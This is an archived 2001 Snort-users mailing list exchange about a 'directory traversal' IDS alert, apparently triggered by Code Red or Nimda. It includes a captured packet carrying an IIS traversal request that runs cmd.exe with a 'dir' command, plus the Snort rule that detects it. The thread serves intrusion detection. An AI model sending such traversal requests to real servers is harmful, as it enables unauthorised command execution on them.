[Snort-users] Directory Traversal

Jim Kipp jkipp5 at ...530...
Mon Oct 1 16:06:13 EDT 2001


I think you are right here. Definitely some kind of IIS rule.  But here
is the packet: (one of many)
--
[**] WEB-MISC http directory traversal [**]
09/30-06:45:05.371371 0:50:73:1:6C:A8 -> 0:60:8:38:86:FA type:0x800
len:0x96
24.83.x.x:3542 -> 192.168.x.x:80 TCP TTL:114 TOS:0x0 ID:32972 IpLen:20
DgmLen:136 DF
***AP*** Seq: 0xF6922490  Ack: 0x7E168448  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65  5c../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64  m32/cmd.exe?/c+d
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  ir r HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A        ction: close..




Erek Adams wrote:
> 
> On Sun, 30 Sep 2001, Jim Kipp wrote:
> 
> > Yes, I kow where the rule is, but I still don't know what it is exactly
> > for. It does look IIS related, because in the payload there are GET
> > ../cmd.exe blah blah
> 
> If the rule you're refering to is:
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC http directory
> traversal"; flags: A+; content: "..\\";reference:arachnids,298;
> classtype:attempted-recon; sid:1112; rev:1;)
> 
> Then it translates into:  Someone used URL with "..\\" in it.  If it's got
> cmd.exe tacked onto it, I'd say it is something like CR or Nimda.
> 
> Could you post the packet payload?  Sanitized of course! :)
> 
> -----
> Erek Adams
> Nifty-Type-Guy
> TheAdamsFamily.Net




More information about the Snort-users mailing list